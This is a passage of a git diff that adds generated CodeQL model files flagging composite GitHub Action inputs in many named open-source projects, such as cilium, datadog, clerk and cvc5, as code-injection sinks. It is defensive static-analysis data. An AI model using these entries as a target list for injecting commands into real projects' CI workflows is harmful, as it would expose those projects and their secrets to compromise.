b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 00000000000..55cd8b18241 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 00000000000..328d58d9e42 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 00000000000..836bda1041a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 00000000000..b6f9ee027f1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 00000000000..2f6458219b6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 00000000000..374a13ccd82 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 00000000000..fb4608ec70b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 00000000000..3a6a4575d30 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 00000000000..d21c609e5ed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 00000000000..76c92f51d26 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 00000000000..dc48b2e8d20 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 00000000000..b46b5592ac5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 00000000000..a38482ba696 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 00000000000..ca1bf2f894f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml new file mode 100644 index 00000000000..4a46ca788e5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml new file mode 100644 index 00000000000..b1c5270165b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml new file mode 100644 index 00000000000..9fcaa3fff76 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml new file mode 100644 index 00000000000..f21c3c1f9de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml new file mode 100644 index 00000000000..7ff68860cf8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml new file mode 100644 index 00000000000..9e3d5bd41e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml new file mode 100644 index 00000000000..63373bd78a7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml new file mode 100644 index 00000000000..529614b8d79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml new file mode 100644 index 00000000000..ce3ce91d773 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml new file mode 100644 index 00000000000..ececaa835e9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml new file mode 100644 index 00000000000..0c19019e4f3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml new file mode 100644 index 00000000000..67a21fc2e86 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml new file mode 100644 index 00000000000..3f0c5e645de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml new file mode 100644 index 00000000000..470109b5e85 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml new file mode 100644 index 00000000000..5ffefd58e53 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml new file mode 100644 index 00000000000..742e1876811 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml new file mode 100644 index 00000000000..97c75ae6f5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml new file mode 100644 index 00000000000..fa98e84315d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml new file mode 100644 index 00000000000..3bc48b644d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml new file mode 100644 index 00000000000..81e07943026 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml new file mode 100644 index 00000000000..a1fdb476748 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml new file mode 100644 index 00000000000..5744f3e7495 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml new file mode 100644 index 00000000000..852e39799d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml new file mode 100644 index 00000000000..a0d7eb51354 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml new file mode 100644 index 00000000000..8d10d22cd5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml new file mode 100644 index 00000000000..c99c630853e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml new file mode 100644 index 00000000000..8554ebec65f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml new file mode 100644 index 00000000000..6f0878a77cb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml new file mode 100644 index 00000000000..198109f790c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml new file mode 100644 index 00000000000..e634eaa38a2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 00000000000..e26ba9755d0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 00000000000..2cda1936f01 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 00000000000..f83cf533944 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git 